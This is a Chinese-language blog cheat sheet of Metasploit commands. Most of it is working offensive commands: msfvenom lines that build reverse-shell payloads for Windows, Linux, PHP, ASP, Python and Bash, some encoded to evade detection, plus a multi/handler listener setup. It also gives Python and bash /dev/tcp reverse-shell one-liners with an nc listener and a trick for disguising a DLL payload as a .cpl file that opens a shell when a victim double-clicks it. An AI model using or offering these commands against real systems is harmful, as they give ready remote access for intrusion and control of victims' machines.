开源是一种精神,分享是一种美德!

metasploit常用命令(二)

Linux W•X 342℃

metasploit常用命令(二)
MSF Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe

msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 –platform win -f asp -o file.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b “\x00” -a x86 –platform win -f c

MSF 生成在 Linux 下反弹的 Meterpreter Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 –platform linux -o shell

MSF 生成反弹 Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b “\x00\x0a\x0d” -a x86 –platform win -f c

MSF 生成反弹 Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

MSF 生成反弹 ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 –platform win -o shell.asp

MSF 生成反弹 Bash Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

MSF 生成反弹 PHP Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php

MSF 生成反弹 Win Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 –platform win -o shell.exe

msf监听反弹
msf > use multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
msf exploit(handler) > set LHOST 你的IP
msf exploit(handler) > set LPORT 反弹连接的端口
msf exploit(handler) > exploit

访问shell.php就会得到一个shell会话
PYTHON 反弹 Shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“你的ip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

nc反弹shell
肉鸡:
# bash -i >& /dev/tcp/反弹的ip/9999 0>&1

黑客机先监听:
# nc -vv -l -p 9999

得到shell会话
[root@xxx ~]#
msfvenom命令行选项如下:

Options:

-p, –payload payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用’-‘或者stdin指定
-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, –nopsled length> 为payload预先指定一个NOP滑动长度
-f, –format format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(编码器)
-a, –arch architecture> 指定payload的目标架构
–platform platform> 指定payload的目标平台
-s, –space length> 设定有效攻击荷载的最大长度
-b, –bad-chars list> 设定规避字符集,比如: ‘\x00\xff’
-i, –iterations count> 指定payload的编码次数
-c, –add-code path> 指定一个附加的win32 shellcode文件
-x, –template path> 指定一个自定义的可执行文件作为模板
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out path> 保存payload
-v, –var-name name> 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表
CPL

其实cpl文件就是dll文件

只需要用msf生成一个dll的payload将名字改成xx.cpl 如果目标双击的话 即可成功getshell

payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=4444 -f dll -o /tmp/test.cpl

可执行文件后缀

Windows支持的可直接执行文件后缀有
exe pif com cmd scr (jar等需要安装三方软件包不在考虑中)

迁移会话到系统进程(如果迁移失败会失去会话,需要重新建立会话。迁移成功后,即使exit主动退出该会话,再次exploit还会自动获得反弹shell。但如果目标系统重启,还是会丢失会话)

转载请注明:LINUX! » metasploit常用命令(二)

喜欢 (1)